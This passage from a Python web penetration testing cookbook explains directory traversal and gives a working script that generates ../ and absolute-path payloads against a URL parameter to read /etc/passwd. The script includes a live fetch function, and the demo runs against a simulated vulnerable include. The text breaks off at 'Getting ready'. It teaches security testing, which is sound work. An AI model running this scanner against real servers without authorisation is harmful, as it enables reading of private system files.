
Python Web Penetration Testing Cookbook

By : Benjamin May, Cameron Buchanan, Andrew Mabbitt, Dave Mound, Terry Ip
Automated URL-based Directory Traversal


Occasionally, a website passes a user-supplied value straight into a file-handling function without restricting where that value may point. This allows the well-known directory traversal attack (a close relative of insecure direct object reference, IDOR, where a parameter names a resource the user should not be able to reach). In this attack, a user can read arbitrary files that the web server process is able to open by manipulating the vulnerable parameter. There are two ways to do this: firstly, by providing an absolute path such as /etc/passwd, which tells the application to start at the root directory, browse to the etc directory and open the passwd file; and secondly, by providing a relative path such as ../../../etc/passwd, which travels up through parent directories until it reaches the root directory and then descends to the intended file.

We will be creating a script that attempts to open a file that is always present on a Linux machine, the aforementioned /etc/passwd, by gradually increasing the number of ../ sequences prepended to a parameter value in a URL. It will identify success by looking for the string root: in the response, which begins the first line of /etc/passwd; checking for the bare word root is not enough, because that word appears in ordinary page content as well.
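The approach described above, written out as an added example rather than the book's own recipe script. It generates the absolute payload and then relative payloads with an increasing number of ../ hops, rewrites the chosen query parameter, and checks each response for the root account line. The target URL http://example.test/view.php, the parameter name page, the include directory /var/www/html/files and the file contents are all constructed here so that the script runs offline; against a live target you would pass http_fetch instead of simulated_fetch.

```python
import re
import posixpath
from urllib.parse import urlparse, parse_qs, urlencode, urlunparse
from urllib.request import urlopen, Request

TARGET_FILE = "etc/passwd"


def traversal_payloads(target=TARGET_FILE, max_depth=10):
    """Absolute path first, then relative paths with 0..max_depth '../' hops."""
    payloads = ["/" + target]
    for depth in range(max_depth + 1):
        payloads.append("../" * depth + target)
    return payloads


def build_url(url, param, value):
    """Return url with query parameter `param` set to `value`; other parameters are kept."""
    parts = urlparse(url)
    query = parse_qs(parts.query, keep_blank_values=True)
    query[param] = [value]
    # safe='/' keeps the slashes readable; the server decodes %2F to the same thing anyway
    return urlunparse(parts._replace(query=urlencode(query, doseq=True, safe="/")))


# The root account line of /etc/passwd: "root:<pw>:0:0:..." at the start of a line.
PASSWD_LINE = re.compile(r"^root:[^:\n]*:0:0:", re.MULTILINE)


def looks_like_passwd(body):
    """True only if the response contains the root account line, not merely the word root."""
    return PASSWD_LINE.search(body) is not None


def find_traversal(url, param, fetch, max_depth=10):
    """Try each payload in turn; return (url, payload) for the first leak, or None."""
    for payload in traversal_payloads(max_depth=max_depth):
        candidate = build_url(url, param, payload)
        if looks_like_passwd(fetch(candidate)):
            return candidate, payload
    return None


def http_fetch(url, timeout=10):
    """Live fetch for real use; the offline demo below does not call it."""
    req = Request(url, headers={"User-Agent": "Mozilla/5.0"})
    with urlopen(req, timeout=timeout) as resp:
        return resp.read().decode("utf-8", errors="replace")


# --- Constructed stand-in for a vulnerable target so the script runs offline ---
FAKE_WEBROOT = "/var/www/html/files"  # hypothetical include directory (assumption)
FAKE_FS = {                            # constructed file contents, not real data
    "/var/www/html/files/about.html": "<h1>About us</h1><p>Our root cause is quality.</p>",
    "/etc/passwd": "root:x:0:0:root:/root:/bin/bash\n"
                   "daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin\n",
}


def vulnerable_include(value):
    """Models code like include("files/" . $_GET['page']): the prefix defeats an
    absolute path, but '../' sequences still walk out of the directory."""
    path = posixpath.normpath(FAKE_WEBROOT + "/" + value)
    return FAKE_FS.get(path, "<h1>404 Not Found</h1>")


def simulated_fetch(url):
    """Fetch function with the same signature as http_fetch, backed by the fake target."""
    value = parse_qs(urlparse(url).query).get("page", [""])[0]
    return vulnerable_include(value)


if __name__ == "__main__":
    hit = find_traversal("http://example.test/view.php?page=about.html", "page", simulated_fetch)
    print("vulnerable:", hit)
```

Because the simulated application prefixes its own directory, the absolute payload fails and the first hit needs four ../ hops, one per component of /var/www/html/files; the about.html page contains the word root and is correctly ignored by the stricter check.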

Getting ready

Identify the URL parameter that you wish...